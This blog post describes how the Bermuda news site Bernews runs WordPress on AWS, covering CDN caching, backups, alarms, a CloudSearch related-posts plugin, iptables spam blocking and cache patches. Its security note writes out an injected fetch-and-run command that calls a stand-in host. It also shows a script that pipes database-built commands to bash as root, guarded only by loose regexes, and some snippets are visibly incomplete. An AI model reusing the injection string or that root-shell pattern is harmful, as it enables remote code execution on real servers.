The technology behind Bermuda’s #1 news site

The Bernews Setup

Bernews.com is Bermuda’s #1 online news site, with 24-hour coverage. We use WordPress as the site’s CMS because it is convenient, flexible, free, extensible and has a lot of third-party support. On the other hand, WordPress is not known for being efficient or scalable, so we have had to modify and tune the code to meet our needs (more about that in other posts). The goals we have when running the site are:

  1. 100% availability.
  2. Reasonable latency.
  3. Ability to handle a sudden surge in traffic when there is a breaking news story.
  4. Low labour costs — we can’t afford to have someone maintaining the site full-time.

I’ll give a brief look at how the site is implemented with those goals in mind.

Our Amazon Web Services Architecture

Bernews.com runs on Amazon Web Services (AWS). We actually use a lot of different services to run the site:

  • CloudFront (the Amazon CDN)
  • CloudWatch (monitoring)
  • CloudSearch (full-text searching)
  • Route 53 (DNS)
  • EC2/EBS (servers)
  • RDS (managed MySQL)
  • IAM (security/access management)
  • ElastiCache

The main services are stitched together like this:


Lessons Learned

Prefer Services to Servers

Whenever possible we rely on a managed service instead of running our own server:

  • Instead of storing static assets on disk we put them in S3.
  • Instead of running Varnish, Nginx or Squid as a reverse proxy we use the CloudFront CDN.
  • We don’t run our own MySQL database, we use a multi-AZ RDS instance.
  • Rather than install memcached we use an ElastiCache node for some caching.

In general, managed services offer more redundancy than a server we run ourselves, and in most cases recovery from a failure is handled automatically.

Of course we do also have the ability to restore from backups if there is a complete service failure, but in general these AWS services have been highly reliable.

Minimize HTTP requests to the server

All images, JavaScript and CSS are served through the CloudFront CDN. This means that retrieving a web page makes just one HTTP request to bernews.com, with the rest of the requests going to cloudfront.bernews.com and s3.bernews.com. This makes it easy for the web server to handle a load surge because it only has to serve about 20KB of compressed HTML, with the rest of the data cached in CloudFront.

Backups are cheap and fast

One very appealing feature of RDS is that it continuously backs up the MySQL database (with the backup typically running about 5 minutes behind). Keeping the full 35 days of backups doesn’t actually cost us anything because we are still within the free allowance.

EBS snapshots are very cheap as well. Amazon only charges for the amount of data that changed between snapshots, which is typically only a few MB. All of our EBS volumes are backed up every 10 minutes with a retention of 24 hourly backups, 7 daily backups and 5 weekly backups. That costs a few dollars a month.
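
A stripped-down sketch of that kind of snapshot job, using the AWS SDK for PHP (the volume ID is a placeholder, and our real script keeps the hourly/daily/weekly tiers rather than this simple 24-hour cutoff):

<?php
// Hypothetical sketch: snapshot an EBS volume and prune snapshots older than 24 hours.
require 'vendor/autoload.php';

use Aws\Ec2\Ec2Client;

$ec2      = Ec2Client::factory(array('region' => 'us-east-1'));
$volumeId = 'vol-11111111';  // placeholder volume ID

$ec2->createSnapshot(array(
    'VolumeId'    => $volumeId,
    'Description' => 'bernews-backup-' . gmdate('Y-m-d-H-i'),
));

$result = $ec2->describeSnapshots(array(
    'Filters' => array(array('Name' => 'volume-id', 'Values' => array($volumeId))),
));

foreach ($result['Snapshots'] as $snapshot) {
    // Our real retention logic is tiered; this sketch just drops anything older than a day.
    if (strtotime($snapshot['StartTime']) < time() - 24 * 3600) {
        $ec2->deleteSnapshot(array('SnapshotId' => $snapshot['SnapshotId']));
    }
}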

EC2+EBS+Elastic IPs = Flexibility

EC2 allows us to upgrade, move or resize a server with no downtime. The basic approach is to:

  • Take a snapshot of the EBS volume.
  • Register an AMI from the snapshot.
  • Launch a new EC2 instance from the AMI.
  • Move the Elastic IP to the new instance.

This approach lets us seamlessly upgrade the OS, resize an EBS volume or move a machine between availability zones. It also lets us create a new instance from a backup if something goes horribly wrong (like a complete AZ failure).
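
To make this concrete, here is a rough sketch of the same sequence using the AWS SDK for PHP. The IDs, device names and instance type are placeholders, and in practice you wait for the snapshot and the AMI to become available between steps:

<?php
// Hypothetical sketch: snapshot -> AMI -> new instance -> move the Elastic IP.
require 'vendor/autoload.php';

use Aws\Ec2\Ec2Client;

$ec2 = Ec2Client::factory(array('region' => 'us-east-1'));

// 1. Snapshot the root EBS volume (placeholder volume ID).
$snapshot = $ec2->createSnapshot(array('VolumeId' => 'vol-11111111'));

// 2. Register an AMI from the snapshot (wait for the snapshot to complete first).
$image = $ec2->registerImage(array(
    'Name'                => 'bernews-migration-' . gmdate('Ymd-Hi'),
    'RootDeviceName'      => '/dev/sda1',
    'BlockDeviceMappings' => array(array(
        'DeviceName' => '/dev/sda1',
        'Ebs'        => array('SnapshotId' => $snapshot['SnapshotId']),
    )),
));

// 3. Launch a new instance from the AMI, possibly resized or in a different AZ.
$reservation = $ec2->runInstances(array(
    'ImageId'      => $image['ImageId'],
    'MinCount'     => 1,
    'MaxCount'     => 1,
    'InstanceType' => 'm1.small',
    'Placement'    => array('AvailabilityZone' => 'us-east-1b'),
));

// 4. Move the Elastic IP so traffic flows to the new instance (placeholder IP).
$ec2->associateAddress(array(
    'InstanceId' => $reservation['Instances'][0]['InstanceId'],
    'PublicIp'   => '203.0.113.10',
));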

Monitor Everything

At Bernews we use three different services to monitor the health of our servers:

  • Amazon CloudWatch (CPU, disk latency, free disk space, free memory)
  • Pingdom (website availability and response times)
  • CopperEgg (provides a great dashboard for realtime server monitoring)

All alarms contact us via e-mail and SMS, so we don’t want them to be noisy. On the other hand, we want our alarms to be reasonably sensitive. Striking that balance took an initial learning period where we tuned our alarms:

  1. We have CloudWatch alarms on INSUFFICIENT_DATA (this happens when a resource is offline). Because CloudWatch can have delays in data collection, we found that the alarm period has to span several collection intervals to avoid false positives.
  2. As we monitor our servers we build up a model of the expected range of values for each one. This lets us make some alarms more sensitive. For example, by tracking the CPU usage of our database server we have lowered the CPU alarm to “CPUUtilization > 25 for 5 minutes” because we now know that situation would be extremely anomalous (see the sketch below).
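
As an illustration, that tightened database CPU alarm could be created roughly like this with the AWS SDK for PHP (the instance identifier and SNS topic ARN are placeholders; this is a sketch rather than our actual tooling):

<?php
// Hypothetical sketch: a CloudWatch alarm for "CPUUtilization > 25 for 5 minutes" on the RDS instance.
require 'vendor/autoload.php';

use Aws\CloudWatch\CloudWatchClient;

$cw = CloudWatchClient::factory(array('region' => 'us-east-1'));

$cw->putMetricAlarm(array(
    'AlarmName'          => 'bernews-db-cpu-high',
    'Namespace'          => 'AWS/RDS',
    'MetricName'         => 'CPUUtilization',
    'Dimensions'         => array(array('Name' => 'DBInstanceIdentifier', 'Value' => 'bernews-db')),
    'Statistic'          => 'Average',
    'Period'             => 300,              // one 5-minute period
    'EvaluationPeriods'  => 1,
    'Threshold'          => 25,
    'ComparisonOperator' => 'GreaterThanThreshold',
    'AlarmActions'       => array('arn:aws:sns:us-east-1:123456789012:bernews-alerts'),  // e-mail/SMS via SNS
));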

CloudLink: Our Internal WordPress Related Posts Plugin

Every story on Bernews has a “Related Posts” section, which lists other stories that are similar to the current one. There are a lot of WordPress plugins that generate related posts, but many of them are slow and resource-intensive when dealing with large numbers of posts.

The challenge is that finding related posts isn’t a very database-friendly query. To find related items a story has to be compared against all other stories in the database to find the best match. Trying to do that with conventional SQL queries quickly becomes very slow.

Finding related posts is best viewed as a full-text search problem — I want to find a post which contains as many of the keywords in the current post as possible. The keywords can be the categories/tags of the post or even the body of the post (an approach that the YARPP plugin takes).

It is possible to do full-text queries in MySQL, but that currently requires the MyISAM engine (at least until MySQL 5.6 is released). The Bernews database server uses the InnoDB storage engine because of its concurrency, reliability and ease of administration (especially when using Amazon’s RDS service).

As Bernews is hosted in AWS I decided to use the CloudSearch full-text indexing service to find related posts. This meant writing a custom WordPress plugin to:

  • Perform an initial crawl of the site, indexing all posts.
  • Add new posts to CloudSearch as they are created.
  • Query CloudSearch to find related posts when an article page is rendered.

For ‘relatedness’ I decided to use the post’s taxonomies (categories and tags). They are added to CloudSearch as a list of words, along with the ID of the post and its date.
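
As an illustration, indexing a post might look roughly like this using the 2011-02-01 document batch API (the document endpoint, field names and hook are simplified placeholders rather than the plugin’s exact code):

// Hypothetical sketch: push a post's taxonomies to CloudSearch when it is published.
function cloudlink_index_post( $post_id ) {
    $post  = get_post( $post_id );
    $terms = wp_get_post_terms( $post_id, array( 'category', 'post_tag' ), array( 'fields' => 'names' ) );

    $batch = array( array(
        'type'    => 'add',
        'id'      => 'post_' . $post_id,
        'version' => time(),
        'lang'    => 'en',
        'fields'  => array(
            'postid'     => $post_id,
            'taxonomies' => strtolower( implode( ' ', $terms ) ),
            'date'       => strtotime( $post->post_date_gmt ),
        ),
    ) );

    // doc-EXAMPLE is a placeholder for our CloudSearch domain's document endpoint.
    wp_remote_post( 'http://doc-EXAMPLE.us-east-1.cloudsearch.amazonaws.com/2011-02-01/documents/batch', array(
        'headers' => array( 'Content-Type' => 'application/json' ),
        'body'    => json_encode( $batch ),
    ) );
}
add_action( 'publish_post', 'cloudlink_index_post' );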

To query for relatedness we take a list of the current post’s taxonomies and create a CloudSearch query like this:

$query = "?bq=taxonomies:'" . implode('|', $terms) . sprintf("'&size=%d", $num_posts + 1) . '&return-fields=postid&rank=-relevance_date';

(Note that we have to get N+1 posts to get N related posts. This is because the query will return a post as being related to itself. That post is stripped out of the results if needed.)
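
For context, executing that query and collecting the related post IDs might look roughly like this (the search endpoint hostname is a placeholder for our CloudSearch domain, and error handling is trimmed):

// Hypothetical sketch: run the CloudSearch query and collect related post IDs.
$response = wp_remote_get( 'http://search-EXAMPLE.us-east-1.cloudsearch.amazonaws.com/2011-02-01/search' . $query );
if ( is_wp_error( $response ) ) {
    return array();  // on any CloudSearch problem we simply skip Related Posts
}

$results  = json_decode( wp_remote_retrieve_body( $response ), true );
$post_ids = array();
foreach ( $results['hits']['hit'] as $hit ) {
    $id = (int) $hit['data']['postid'][0];
    if ( $id !== get_the_ID() ) {  // strip the current post from its own results
        $post_ids[] = $id;
    }
}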

Note that we have a custom rank for our results. We want to sort by the relevance of the text and break ties on the post date. To do that we define a custom rank as something like:
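
The actual expression is configured on the CloudSearch domain; an illustrative relevance_date expression, assuming the date field holds epoch seconds, might be:

relevance_date = text_relevance*10000000000 + date

Scaling text_relevance (an integer score) this way keeps relevance dominant while letting the post date break ties.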


The plugin is coded so that if there are any problems with CloudSearch (for example, the service is down) the “Related Posts” section of the article simply isn’t added at all.

CloudLink finds related posts extremely quickly. I changed the hook to add an HTML comment to the related posts showing the total time taken. Finding related posts takes 5-20 milliseconds; some examples:

<!-- Cloudlink found 427 related posts in 5 milliseconds -->
<!-- Cloudlink found 3318 related posts in 10 milliseconds -->
<!-- Cloudlink found 1403 related posts in 20 milliseconds -->

To avoid making a lot of CloudSearch requests I added the final HTML for the related posts to the object cache. This is useful in the case where a page can’t be cached because a user has cookies (e.g. because they added a comment to the page). This lets us avoid querying the CloudSearch server again.
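
A rough sketch of that caching layer, using the standard WordPress object cache functions (the cache group, expiry and the cloudlink_render_related_posts() helper are illustrative placeholders):

// Hypothetical sketch: keep the rendered Related Posts HTML in the object cache.
$cache_key = 'cloudlink_related_' . get_the_ID();
$html      = wp_cache_get( $cache_key, 'cloudlink' );

if ( false === $html ) {
    $html = cloudlink_render_related_posts( get_the_ID() );  // placeholder helper that queries CloudSearch
    wp_cache_set( $cache_key, $html, 'cloudlink', 3600 );    // cache for an hour
}

echo $html;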

This plugin requires CloudSearch (which costs some money) and some manual setup (to create the CloudSearch domain), so it isn’t suitable for public release. On the other hand, if you have a large WordPress installation and want to try this out then feel free to contact us.

Blocking Comment Spammers

Bernews attracts a lot of comment spam. Almost all of it is blocked by Akismet, but the spammers still use up server resources (network, CPU, disk). To reduce the impact of the worst spammers we have started using iptables to block them. That is straightforward to do because the offending IP addresses are already recorded in the WordPress database.

Once an hour the root user runs a script that blocks the IP addresses which have generated at least 10 comments marked as spam. To avoid generating an unlimited number of rules we limit the list to the 256 addresses with the most spam. The script looks like this:

/sbin/iptables --flush
/usr/bin/mysql --batch --skip-column-names --host=HOST --user=USER --password=PASSWORD "--execute=SELECT t.iptables FROM (SELECT CONCAT('/sbin/iptables -I INPUT -s ', c.comment_author_ip, ' -j DROP -m comment --comment \'', COUNT(*), ' spam comments\'') as iptables, COUNT(*) as instances, c.comment_author_ip FROM wp_comments AS c WHERE c.comment_approved ='spam' AND c.comment_author_ip REGEXP '[0-9]+.[0-9]+.[0-9]+.[0-9]' GROUP BY c.comment_author_ip HAVING instances >= 10 ORDER BY instances DESC LIMIT 256) AS t WHERE t.comment_author_ip REGEXP '[0-9]{1,3}[.][0-9]{1,3}[.][0-9]{1,3}[.][0-9]{1,3}'" wordpress | /bin/bash

The script results in rules like this:

Chain INPUT (policy ACCEPT)
target     prot opt source               destination
DROP       all  --       anywhere             /* 10 spam comments */
DROP       all  --  anon-184-65.vpn.ipredator.se  anywhere             /* 10 spam comments */
DROP       all  --  h176-227-197-109.host.redstation.co.uk  anywhere             /* 10 spam comments */
DROP       all  --          anywhere             /* 91 spam comments */
DROP       all  --  46-105-52-167.kimsufi.com  anywhere             /* 104 spam comments */
DROP       all  --        anywhere             /* 130 spam comments */
DROP       all  --       anywhere             /* 152 spam comments */
DROP       all  --       anywhere             /* 168 spam comments */
DROP       all  --  sd-35481.dedibox.fr  anywhere             /* 172 spam comments */
DROP       all  --        anywhere             /* 205 spam comments */
DROP       all  --         anywhere             /* 279 spam comments */
DROP       all  --       anywhere             /* 359 spam comments */

Spam comments older than 15 days are deleted, so blocked IP addresses will be unblocked after about two weeks. This will either:
a) Unblock people who got a previously blocked IP address.
b) Allow the spammers to post another 10 spam comments.

Security note: We are pulling information from the database and using it to construct commands that will be run as root. We want to avoid privilege escalation bugs where an attacker manages to get a comment_author_ip value like “; curl BAD_URL > /tmp/x; /bin/sh /tmp/x; echo” into the database, resulting in the execution of

sudo /sbin/iptables -I INPUT -s; curl BAD_URL > /tmp/x; /bin/sh /tmp/x; echo -j DROP -m comment --comment '10 spam comments'

To avoid that we add “AND c.comment_author_ip REGEXP ‘[0-9]+.[0-9]+.[0-9]+.[0-9]'” to a WHERE clause so that only valid IP addresses are extracted. We filter after grouping to reduce the amount of regular expression processing.

Opera Prefetch

This morning load on the Bernews server was unusually high so I took a look at the web logs for that time period. A lot of the load was being caused by requests like these:

- - [27/Jan/2013:17:25:00 +0000] "GET /2012/01/plp-oba-on-guest-worker-policies/?replytocom=149409 HTTP/1.1" 200 71657 "" "Opera/9.80 (Windows NT 5.1; U; en) Presto/2.10.229 Version/11.60" 1685448
- - [27/Jan/2013:17:25:01 +0000] "GET /2012/01/plp-oba-on-guest-worker-policies/?replytocom=149405 HTTP/1.1" 200 71658 "" "Opera/9.80 (Windows NT 5.1; U; en) Presto/2.10.229 Version/11.60" 2070743
- - [27/Jan/2013:17:25:01 +0000] "GET /2012/01/plp-oba-on-guest-worker-policies/?replytocom=149873 HTTP/1.1" 200 71656 "" "Opera/9.80 (Windows NT 5.1; U; en) Presto/2.10.229 Version/11.60" 2165319
- - [27/Jan/2013:17:25:01 +0000] "GET /2012/01/plp-oba-on-guest-worker-policies/?replytocom=149868 HTTP/1.1" 200 71656 "" "Opera/9.80 (Windows NT 5.1; U; en) Presto/2.10.229 Version/11.60" 2486523
- - [27/Jan/2013:17:25:01 +0000] "GET /2012/01/plp-oba-on-guest-worker-policies/?replytocom=149743 HTTP/1.1" 200 71656 "" "Opera/9.80 (Windows NT 5.1; U; en) Presto/2.10.229 Version/11.60" 2715922
- - [27/Jan/2013:17:25:01 +0000] "GET /2012/01/plp-oba-on-guest-worker-policies/?replytocom=149629 HTTP/1.1" 200 71656 "" "Opera/9.80 (Windows NT 5.1; U; en) Presto/2.10.229 Version/11.60" 2616717

(I’ve changed the IP address, but the real address appears to be in China which is unusual for Bernews…)

The WordPress post/?replytocom pattern has caused a bunch of issues already. The problem is that pages with query strings bypass the W3TC cache and are generated on-the-fly. This isn’t a problem until some sort of crawler starts enumerating and fetching all the links on a page. For example, Bing was prone to doing that until I disabled those URLs in the Bing webmaster tools. These requests appear to be generated either by super-aggressive link pre-fetching in Opera or some sort of home-brew web crawler that is using the Opera user-agent string.

In this case the load didn’t last for very long and that visitor hasn’t returned. If this causes problems in the future we will block/throttle/cache appropriately.

Using Temporary Credentials With the EC2 CLI

Using the EC2 command line tools is convenient for ad-hoc AWS tasks or manually-run scripts. This requires passing the access key ID and secret access key to the tools, either through environment variables (AWS_ACCESS_KEY, AWS_SECRET_KEY) or command line options (--aws-access-key, --aws-secret-key). To avoid leaking our AWS credentials we want to follow several security best practices when using the EC2 CLI:

  • Least privilege: the credentials we use should only have privileges for the operations we want to perform.
  • MFA: using the credentials should require multi-factor authentication.
  • Rotation: the credentials should be rotated frequently.
  • Conditions: place time/location restrictions on how credentials can be used.

To solve this we can create an IAM user and generate temporary credentials for that user using an MFA token. Here is a quick example:

First create an IAM group with the desired policy. The condition shown here is one way to require MFA for every action:

{
  "Version": "2012-10-17",
  "Statement": [
    {
      "Effect": "Allow",
      "Action": "*",
      "Resource": "*",
      "Condition": {
        "Bool": { "aws:MultiFactorAuthPresent": "true" }
      }
    }
  ]
}

This policy allows access to all features, but only with MFA access. A more sophisticated policy would allow access to only some features and restrict access by time or IP address (for example, you can restrict the credentials to only work on specific EC2 machines, identified by IP address).
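
For example, a condition block that requires MFA and also restricts use to a single source IP address (the address here is a placeholder) could look like:

"Condition": {
  "Bool":      { "aws:MultiFactorAuthPresent": "true" },
  "IpAddress": { "aws:SourceIp": "203.0.113.10/32" }
}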

Next, create a new IAM user, add the user to the group, and associate an MFA token with the user.

The Amazon Security Token Service can generate temporary credentials for an IAM user. The EC2 CLI tools can use the temporary credentials (through the AWS_DELEGATION_TOKEN environment variable or --security-token command line parameter), so we just need to generate temporary credentials and pass them to the EC2 CLI. To generate a temporary token we will need four pieces of information:

  • The access key ID.
  • The secret access key.
  • The ARN of the MFA token.
  • The current value of the MFA token.

There isn’t a command line program to generate the tokens, but a short Python program can produce the required information:

import boto
import sys

if len(sys.argv) != 5:
    print 'Usage: ' + sys.argv[0] + ' access_key secret_key mfa_serial_number mfa_token'
    sys.exit(1)

access_key = sys.argv[1]
secret_key = sys.argv[2]
mfa_serial_number = sys.argv[3]
mfa_token = sys.argv[4]

sts = boto.connect_sts(access_key, secret_key)

token = sts.get_session_token(duration = 3600, force_new = True, mfa_serial_number = mfa_serial_number, mfa_token = mfa_token)
print 'export AWS_ACCESS_KEY=' + token.access_key
print 'export AWS_SECRET_KEY=' + token.secret_key
print 'export AWS_DELEGATION_TOKEN=' + token.session_token

Assuming the program is called ‘sts-get-token’, it is run like this:

./sts-get-token BJ2FP3J0ZD2F1UTX2NM lxeHJ2qefgNV43xesFEE12aZfr321b0xBAAFiG8F arn:aws:iam::123456789:mfa/login 654321

This prints out three environment variables. After setting the environment variables the EC2 commandline tools will work for the next hour. After that they will fail with “Client.RequestExpired: Request has expired.”

How effective is the CloudFront CDN?

Bernews uses CloudFront as an origin-pull CDN. The W3 Total Cache (W3TC) plugin automatically replaces references to images, JavaScript and CSS with URLs that point at our CloudFront distribution. So, instead of pointing at the bernews.com server directly, a story will reference cloudfront.bernews.com like this:
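
<img src="http://cloudfront.bernews.com/wp-content/uploads/2012/11/all-designs-on-stage.jpg" alt="" />

(The markup above is illustrative; the important part is that the src attribute points at cloudfront.bernews.com rather than bernews.com.)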


CloudFront will then request the image from its ‘real’ URL (in this case http://bernews.com/wp-content/uploads/2012/11/all-designs-on-stage.jpg). The image is cached by CloudFront and used to serve other requests without retrieving the image from the bernews.com server.

This caching should greatly reduce the load on the server, but how effective is it?

To investigate I picked a random story that had a lot of images in it:


Our stats show that this story had 5,221 views (which doesn’t include the 73 times Google crawled it or the stunning 1,046 times that Bing crawled the page).

This story has several images in it. I broke down the stats for the first image in the story:


The Apache logs show that CloudFront has only retrieved the Belmont-Golf-Course-Fire-Bermuda-November-29-2012-5-620×413.jpg image 50 times. That is roughly a 100X reduction in network load on our web server!

In general, news stories are very CDN friendly — stories break, are read a lot and then are rarely retrieved. Having the images from our top stories cached in CloudFront means we can easily handle a large surge in traffic on a popular story. When I look at more popular stories the number of CloudFront requests remains basically constant even when the number of views doubles or triples.

W3TC Caching and Multiple WordPress installations

Bernews uses multiple WordPress installations on the same server. For example, bernews.com/flights, bernews.com/weather and bernews.com are all separate installations.

Adding W3 Total Cache to the installations caused confusion because the W3TC cache keys are unique per host, but not per installation. That means that sometimes installation A will get an entry cached by installation B, with completely unpredictable results.

To solve the problem I prepended an MD5 hash of the plugin’s file path to the cache key that W3TC generates; since each installation has its own copy of the plugin, the hash is unique per installation. To do this for the object cache I modified W3_ObjectCache::_get_cache_key() in w3-total-cache/lib/W3/ObjectCache.php by adding this line to the key calculation code, after the sprintf() call:

$key = md5(__FILE__) . '_' . $key;

For the database query cache I made the same modification to W3_Db::_get_cache_key() in w3-total-cache/lib/W3/Db.php.

Bernews uses the “disk (enhanced)” option for page caching, which works fine with multiple installations. If we were using disk, APC or memcached then I think it would be necessary to make a similar change to W3_PgCache::_get_page_key() in w3-total-cache/lib/W3/PgCache.php.

W3TC page cache and spam comments

A few weeks ago I was examining Bernews performance and saw that the W3 Total Cache (W3TC) page cache was being invalidated far more often than I expected. This was happening even when no stories were being posted or comments approved.

It turns out that the page cache was being invalidated when a new comment was being submitted. Unfortunately Bernews receives a spam comment every few minutes. The excellent Akismet plugin catches all of them but the cached version of the homepage was being constantly invalidated.

I fixed the problem by modifying W3TC to only purge the page cache when a comment transitions to or from the approved state. To do that I had to change the W3_Plugin_PgCache::run() function in wp-content/plugins/w3-total-cache/lib/W3/Plugin/PgCache.php.

I removed these lines:

add_action('comment_post', array(
    ), 0);
add_action('edit_comment', array(
    ), 0);
add_action('delete_comment', array(
    ), 0);
add_action('wp_set_comment_status', array(
    ), 0, 2);
add_action('trackback_post', array(
    ), 0);
add_action('pingback_post', array(
    ), 0);

And added these instead:

add_action('comment_unapproved_to_approved', array(
    ), 0);
add_action('comment_spam_to_approved', array(
    ), 0);
add_action('comment_deleted_to_approved', array(
    ), 0);
add_action('comment_approved_to_deleted', array(
    ), 0);
add_action('comment_approved_to_unapproved', array(
    ), 0);
add_action('comment_approved_to_spam', array(
    ), 0);

Note that I did not change the db cache or object cache code! Those caches should be invalidated when a new comment is submitted.

This change greatly decreased the number of times the page cache was invalidated, improving the average response time of the site.